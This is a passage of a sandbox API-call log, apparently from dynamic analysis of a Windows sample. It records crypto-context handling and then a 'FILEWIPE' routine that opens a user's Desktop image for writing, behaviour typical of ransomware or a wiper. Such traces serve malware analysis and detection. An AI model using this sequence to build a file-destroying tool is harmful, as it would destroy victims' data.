lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.857] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.858] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e540 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e000 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.860] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e450 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x6f9748, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.862] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.862] CryptReleaseContext (hProv=0x6969c0, dwFlags=0x0) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.863] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.866] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e93f80, ftCreationTime.dwHighDateTime=0x1d5e220, ftLastAccessTime.dwLowDateTime=0x28f76500, ftLastAccessTime.dwHighDateTime=0x1d5d8c0, ftLastWriteTime.dwLowDateTime=0x28f76500, ftLastWriteTime.dwHighDateTime=0x1d5d8c0, nFileSizeHigh=0x0, nFileSizeLow=0xdbe2, dwReserved0=0x0, dwReserved1=0x657690, cFileName="4N8tFmD4.gif", cAlternateFileName="")) returned 0x6b8b38 [0075.868] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.868] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.868] CharLowerBuffW (in: lpsz="byte[56290]", cchLength=0xb | out: lpsz="byte[56290]") returned 0xb [0075.869] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.869] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.869] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.869] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.869] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.870] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.870] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.870] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.870] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.871] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.871] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.871] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.871] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.871] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4n8tfmd4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.872] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.872] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0075.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.874] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.874] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.874] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.874] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.874] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, 